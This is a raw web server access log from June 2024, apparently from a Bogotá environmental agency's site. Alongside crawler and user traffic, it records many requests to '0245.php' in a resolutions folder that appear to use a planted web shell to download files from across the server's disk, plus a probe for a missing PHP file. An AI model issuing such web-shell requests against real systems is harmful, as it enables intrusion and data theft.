201.245.192.253 - - [16/Jun/2024:20:13:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.31.68 - - [16/Jun/2024:20:13:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos&f=VideoClimaLaboral.flv&ft=download HTTP/1.1" 200 245400
216.245.221.92 - - [16/Jun/2024:20:14:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:20:14:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.31.250 - - [16/Jun/2024:20:14:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2451-2500&f=00002497.tif&ft=download HTTP/1.1" 200 114964
172.22.2.4 - - [16/Jun/2024:20:12:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.54 - - [16/Jun/2024:20:14:31 -0500] "GET /Publicaciones/2024EE06825.pdf HTTP/1.1" 404 227
201.245.192.253 - - [16/Jun/2024:20:14:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
156.59.198.136 - - [16/Jun/2024:20:15:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_2oni2l7abqhri9fomgjj4ji2k1 HTTP/1.0" 200 1034
172.22.2.4 - - [16/Jun/2024:20:15:14 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [16/Jun/2024:20:13:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55442
201.245.192.253 - - [16/Jun/2024:20:15:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
191.156.183.34 - - [16/Jun/2024:20:15:44 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
191.156.183.34 - - [16/Jun/2024:20:15:44 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
191.156.181.253 - - [16/Jun/2024:20:15:44 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
191.156.184.145 - - [16/Jun/2024:20:15:44 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
47.128.112.41 - - [16/Jun/2024:20:15:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5C&f=class-wp-embed.php&ft=download&white=1 HTTP/1.1" 200 11355
191.156.183.34 - - [16/Jun/2024:20:15:44 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
191.156.183.34 - - [16/Jun/2024:20:15:51 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
191.156.183.34 - - [16/Jun/2024:20:15:59 -0500] "POST /appsia/controlador HTTP/1.1" 200 4621
157.55.39.54 - - [16/Jun/2024:20:15:59 -0500] "GET /forest/ HTTP/1.1" 200 12041
201.245.192.253 - - [16/Jun/2024:20:16:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.48.248 - - [16/Jun/2024:20:16:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000&f=2000+2400-2449.tif&ft=download HTTP/1.1" 200 4533916
213.180.203.72 - - [16/Jun/2024:20:16:40 -0500] "GET /robots.txt HTTP/1.1" 404 1018
213.180.203.185 - - [16/Jun/2024:20:16:41 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [16/Jun/2024:20:16:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36443
201.245.192.253 - - [16/Jun/2024:20:16:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34551
54.36.232.187 - - [16/Jun/2024:20:17:00 -0500] "GET /IsolucionSDA/Administracion/Salaedicion/Articulo.asp HTTP/1.1" 200 527
47.128.112.198 - - [16/Jun/2024:20:17:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes&f=feed-atom.php&ft=download HTTP/1.1" 200 2984
201.245.192.253 - - [16/Jun/2024:20:17:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
191.156.183.34 - - [16/Jun/2024:20:17:48 -0500] "GET /appsia/images/logo_escudo.png HTTP/1.1" 200 36965
191.156.182.224 - - [16/Jun/2024:20:17:47 -0500] "POST /appsia/controlador HTTP/1.1" 200 99683
47.128.48.3 - - [16/Jun/2024:20:17:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2985.pdf&ft=download&white=1 HTTP/1.1" 200 20135
201.245.192.253 - - [16/Jun/2024:20:18:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
156.59.198.135 - - [16/Jun/2024:20:18:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_s211e9q0e674dl88a1l638oqd4 HTTP/1.0" 200 1034
40.77.167.20 - - [16/Jun/2024:20:18:52 -0500] "GET /reporte-calidad-del-aire-15-de-agosto.html HTTP/1.1" 200 745
201.245.192.253 - - [16/Jun/2024:20:18:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34583
216.245.221.92 - - [16/Jun/2024:20:19:02 -0500] "HEAD / HTTP/1.1" 200 -
123.180.244.67 - - [16/Jun/2024:20:19:04 -0500] "GET / HTTP/1.1" 200 319
47.128.22.169 - - [16/Jun/2024:20:19:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1903.pdf&ft=download&white=1 HTTP/1.1" 200 347815
201.245.192.253 - - [16/Jun/2024:20:19:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:20:19:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34551
201.245.192.253 - - [16/Jun/2024:20:19:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
52.167.144.212 - - [16/Jun/2024:20:19:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20301%20AL%20400/RESOLUCION%200311%20DE%202007.pdf HTTP/1.1" 200 403688
47.128.22.154 - - [16/Jun/2024:20:19:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2251-2300&f=00002296.tif&ft=download HTTP/1.1" 200 581283
172.22.2.4 - - [16/Jun/2024:20:18:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:20:20:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.22.150 - - [16/Jun/2024:20:20:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2093.pdf&ft=download HTTP/1.1" 200 376487
172.22.2.4 - - [16/Jun/2024:20:19:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
47.128.58.83 - - [16/Jun/2024:20:21:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos&f=UnaSemanaparaelAmbiente.flv&ft=download HTTP/1.1" 200 23953042
201.245.192.253 - - [16/Jun/2024:20:21:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.39 - - [16/Jun/2024:20:21:54 -0500] "GET /secretaria-de-ambiente-destaca-aportes-de-empresas-y-ciudadanos-que-ayudaron-a-mitigar-efectos-de-la-alerta-fase-i.html HTTP/1.1" 304 -
47.128.63.219 - - [16/Jun/2024:20:22:03 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:20:22:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.29.112 - - [16/Jun/2024:20:22:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3254.pdf&ft=download HTTP/1.1" 200 20135
201.245.192.253 - - [16/Jun/2024:20:23:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.25.113 - - [16/Jun/2024:20:23:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2351-2400&f=00002399.tif&ft=download HTTP/1.1" 200 487075
216.245.221.92 - - [16/Jun/2024:20:24:02 -0500] "HEAD / HTTP/1.1" 200 -
47.128.19.7 - - [16/Jun/2024:20:24:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000&f=2000+1850-1899.tif&ft=download HTTP/1.1" 200 4509340
201.245.192.253 - - [16/Jun/2024:20:24:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.102.3.156 - - [16/Jun/2024:20:24:27 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19BXhFjbva4oj9u/01VqTKYTiH94RHPZpyDdGRLihHAwESZEFMUkLgmZW89yDAr/R8Z4XGg6rPECVqUkaz49pwn7+mLZhH8ldy5QPhevwFk+xDMPZnp6BI2&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 109
186.102.3.156 - - [16/Jun/2024:20:24:28 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1837rhCRdZIlGHFsqfr1TSk3Wf9bv/a1ibgRCSkaEjywjNMQJZmfB5lFy816qJl0ZsFiTmcT8i43xtiAFunIBrXkSGEuFj4Pzj7JEJRKXoBvAM3L58b9MKbF92p/uh2O/DjL1B3p/XJKsyRJL4ljT0thoASQXNnTlkI3P/Z+L3+JA27pwTE1jlwOhRpng9ML8c8CgParmjsAZh1os3YseDwEOpbGdkbWSHtNSg43mFmVs+gmuNH2AWGtM61osxAjgFa/nLodWjP2w==&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 74
186.102.3.156 - - [16/Jun/2024:20:24:28 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+aKSr4v3JBKndyqSE9+sXJFSYzQG1lb2IM6pAr+gMlo1778wcb/MePmUM4Aq0/qRAi0QncqG8aSzG6FNPx8xq5IEt+bYTw78jCBhmkmUHZJtr8CirZzdtngjH9FZE7sGZY0jkKS2eSX9l9RdfIVhZnPNuCyiuSZmZ50KoAwfGIzycqEQLp+k2Y0Ey/oYIwvDDSIePzD/UGZ7MutooxZFhshB/5PeqjQ884ygdLjqTAXl3fpf8k74Rr&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 151
186.102.3.156 - - [16/Jun/2024:20:24:28 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+jS906h8rXEA8poKhT4iHnJ3WVCo9mHr2iSeSwvLx7ZZhbHDyehfYms8hZ9IvSBIfiFs2gl2+apl728Qe+PeqNCTVYBv//t3DTpRsgnCq8ihln0+LdDDVX&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 104
186.102.3.156 - - [16/Jun/2024:20:24:28 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18mbNGs+CCGbUi4Ur9djyYsu11N/nHKkJYLLX3pFEOmiklNEGsDU+1OC93k2RmPrPrj1+aiekV/4hqiKjCtAjyXAdP8w8HjDej+FBxB9QpavmXBWhccW9IE30z7aQ5Cw6fauiurfJDuu7GUW1Op9BwDkRQO6ny7nAbys0/N5+1oFN9d8xlSAwBlWOepQUzEuVw+hbYsk/rKTRMqi95F1q3OPHuDsJDfzpoBxUBstVxjMYxTABilzqISBYuIBJ9pyy7EOB6hUBrYAw==&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 114
186.102.3.156 - - [16/Jun/2024:20:24:28 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18uEYSh/srzdqkN3y+cjLmE6gkrhXP9OXgebChJ9h7THGIE4t2GHsMCMCWutzJ5qHIQ3adeOIk1xRit0VRIbfWAgxwsjYlalBflEWw3nfFVNpuPSLIMXWfOiitPgaG9FFySsRdaczxYYw==&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 96
186.102.3.156 - - [16/Jun/2024:20:24:28 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18OCpkAg5zPqxdWoG3IooSigajGANKdjvYvAfnkeYBZmOYchjQ3uLDow7tfSn9AIv3skU0vDJP1LpRqQGegB0WMY42NWeXX6AwwhaUDjCb3iGcFh7pdYk0/&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 104
186.102.3.156 - - [16/Jun/2024:20:24:28 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/b4NyzizdLXdbJOxOF+MdGKFZDr6iAtZUpcwVeqa3fSN1KElwgpuXX/0W3VgXrQ+h8/kUxZdC/ebSqVT1Q+hLORLq3N9WlsqoYagAXFBoq+VgC8DDU8o9u&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 109
186.102.3.156 - - [16/Jun/2024:20:24:28 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19kn0fLZ56zq9j7WWAhRYk3Q5Y0tSsvBhK8J/VWWCW1plQUPZBTUW2xUpE7Rv0ecp7EcBidDa4aAzgshjXROrJo7n6wTaE6RDMjPF/LlYV7u8tXSviVzmms9Yitumi8Y6pOXMkCR2G8KfUliLx5sMFhuP/HUxFAb5Y=&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 132
186.102.3.156 - - [16/Jun/2024:20:24:29 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+7L4SYFntz+fV+N1cqKtRq12F+bYupUd3JvEkY333/YNCDGwB6jaXCru01hbV+P+cdikR3rkfAkR9vTNxnSSytfwDWrDFI4o26jdP4KHDqO1p8gJjEJxMT85IKaDaXoiy5qGrwWQQpmxAfk1NZTfhIv0NJHgtofUeh1ps4XifaR0EoVObjzQDGEpU3F4r/MxBEBqxxTCoD9cnvL3lE0AJrhvGNp2OnKWY3jeuHe+8sAqGG+0uKhFqmlkleEw3PdVPBZuvrnfslPA==&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 74
186.102.3.156 - - [16/Jun/2024:20:24:29 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18zcF3YUHEYU6hp8c/5vN/Cg/RUf0kdy7fu0+49QltdtJ/F1Y/IqyFY0nHWiOKoJbeSbD6xmmwYm9nBQLP7iA6mtmsOWRkLjjq7EGPQJQ2lTD5IoIXV+RyJekEImVK4fG9NPgwPnwS8+w==&u=U2FsdGVkX1/0fVRrgndLolohKgRCc68Wkopm3DzUgl0P2MCaQCbxgFqIvGpwFkV3&y=U2FsdGVkX18zNR1H8AKninrfYvm3m0YrOf4HHpRIF+m9BUUsk52GsjAqqY1X7dfb HTTP/1.1" 200 120
201.245.192.253 - - [16/Jun/2024:20:24:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.50.16 - - [16/Jun/2024:20:24:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=tbl_chart.php&ft=download&white=1 HTTP/1.1" 200 4126
66.249.66.21 - - [16/Jun/2024:20:25:04 -0500] "GET /bla/boletinlegal/Circulares/2019/Circular%20No.%200005%20del%2020%20de%20Marzo%20de%202019.pdf HTTP/1.1" 200 159877
216.244.66.195 - - [16/Jun/2024:20:25:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0932.pDF HTTP/1.1" 200 415268
66.249.66.21 - - [16/Jun/2024:20:25:05 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/447.pdf HTTP/1.1" 304 -
66.249.66.21 - - [16/Jun/2024:20:25:05 -0500] "GET /bla/boletinlegal/Circulares/2024/CIRCULAR%20No.%2000002%20DEL%2031%20DE%20ENERO%20DEL%202024.pdf HTTP/1.1" 200 382171
201.245.192.253 - - [16/Jun/2024:20:25:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.38.85 - - [16/Jun/2024:20:25:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3785.pdf&ft=download HTTP/1.1" 200 364199
216.244.66.195 - - [16/Jun/2024:20:25:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1229.pdf HTTP/1.1" 200 394768
66.249.66.20 - - [16/Jun/2024:20:26:05 -0500] "GET /BLA/resoluciones/AUTOS%202023/00260.pdf HTTP/1.1" 200 416476
172.22.2.4 - - [16/Jun/2024:20:24:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.53.73 - - [16/Jun/2024:20:26:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1847.pdf&ft=download&white=1 HTTP/1.1" 200 433831
216.244.66.195 - - [16/Jun/2024:20:26:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1273.pdf HTTP/1.1" 200 1195412
201.245.192.253 - - [16/Jun/2024:20:26:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:20:26:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1547.pdf HTTP/1.1" 200 461260
47.128.116.218 - - [16/Jun/2024:20:26:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0541.pdf&ft=download HTTP/1.1" 200 360103
201.245.192.253 - - [16/Jun/2024:20:26:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36443
201.245.192.253 - - [16/Jun/2024:20:26:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34551
172.22.2.4 - - [16/Jun/2024:20:25:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [16/Jun/2024:20:27:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:20:27:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1839.pdf HTTP/1.1" 200 361854
47.128.50.159 - - [16/Jun/2024:20:27:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cautodeclaracion22&f=autodeclaracion.php&ft=download HTTP/1.1" 200 12250
216.244.66.195 - - [16/Jun/2024:20:28:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1988.pdf HTTP/1.1" 200 360592
47.128.120.160 - - [16/Jun/2024:20:28:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2339.pdf&ft=download HTTP/1.1" 200 388775
103.119.128.67 - - [16/Jun/2024:20:28:18 -0500] "GET /didi.php HTTP/1.1" 404 1214
201.245.192.253 - - [16/Jun/2024:20:28:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:20:28:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2156.pdf HTTP/1.1" 200 278078
201.245.192.253 - - [16/Jun/2024:20:28:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34579
216.245.221.92 - - [16/Jun/2024:20:29:02 -0500] "HEAD / HTTP/1.1" 200 -
128.199.220.150 - - [16/Jun/2024:20:29:03 -0500] "GET /robots.txt HTTP/1.1" 404 1018
66.249.66.21 - - [16/Jun/2024:20:29:06 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20sentencia%20C%20401%20de%202010.doc HTTP/1.1" 304 -
66.249.66.19 - - [16/Jun/2024:20:29:07 -0500] "GET /BLA/resoluciones/AUTOS%202023/1288.pdf HTTP/1.1" 304 -
66.249.66.20 - - [16/Jun/2024:20:29:07 -0500] "GET /Publicaciones/2024EE84797.pdf HTTP/1.1" 404 227
216.244.66.195 - - [16/Jun/2024:20:29:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2316.pdf HTTP/1.1" 200 364655
201.245.192.253 - - [16/Jun/2024:20:29:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:20:29:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.28.115 - - [16/Jun/2024:20:29:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Clavanderias%5C&f=lavanderias.swf&ft=download HTTP/1.1" 200 396960
201.245.192.253 - - [16/Jun/2024:20:29:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34549
216.244.66.195 - - [16/Jun/2024:20:30:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0350.pdf HTTP/1.1" 200 651189
47.128.32.35 - - [16/Jun/2024:20:30:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1-50&f=00000030.tif&ft=download HTTP/1.1" 200 54104
201.245.192.253 - - [16/Jun/2024:20:30:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:20:30:43 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%204%20del%2019%20de%20abril%20de%202012.pdf HTTP/1.1" 304 -
216.244.66.195 - - [16/Jun/2024:20:30:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0694.pdf HTTP/1.1" 200 305662
47.128.22.40 - - [16/Jun/2024:20:30:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1592.pdf&ft=download&white=1 HTTP/1.1" 200 978599
201.245.192.253 - - [16/Jun/2024:20:31:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:20:31:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0955.pdf HTTP/1.1" 200 450342
47.128.125.90 - - [16/Jun/2024:20:31:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2053.pdf&ft=download HTTP/1.1" 200 364199
172.22.2.4 - - [16/Jun/2024:20:30:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [16/Jun/2024:20:32:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0984.pdf HTTP/1.1" 200 313863
201.245.192.253 - - [16/Jun/2024:20:32:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.45.197 - - [16/Jun/2024:20:32:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=http.php&ft=download HTTP/1.1" 200 16235
172.22.2.4 - - [16/Jun/2024:20:31:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57485
216.244.66.195 - - [16/Jun/2024:20:32:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1954.pdf HTTP/1.1" 200 447260
47.128.40.130 - - [16/Jun/2024:20:33:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+401-450&f=00000404.tif&ft=download HTTP/1.1" 200 66342
216.244.66.195 - - [16/Jun/2024:20:33:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2021.pdf HTTP/1.1" 200 2274924
201.245.192.253 - - [16/Jun/2024:20:33:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.45.16 - - [16/Jun/2024:20:33:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150907-1550-947000.txt&ft=download HTTP/1.1" 200 678
216.245.221.92 - - [16/Jun/2024:20:34:02 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [16/Jun/2024:20:34:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2160.pdf HTTP/1.1" 200 279323
172.22.2.4 - - [16/Jun/2024:20:32:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61446
201.245.192.253 - - [16/Jun/2024:20:34:21 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.27.180 - - [16/Jun/2024:20:34:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4114.pdf&ft=download&white=1 HTTP/1.1" 200 380583
181.63.25.20 - - [16/Jun/2024:20:34:29 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 138603
181.63.25.20 - - [16/Jun/2024:20:34:32 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 259416
201.245.192.253 - - [16/Jun/2024:20:34:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
216.244.66.195 - - [16/Jun/2024:20:34:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2502.pdf HTTP/1.1" 200 410954
181.63.25.20 - - [16/Jun/2024:20:35:03 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
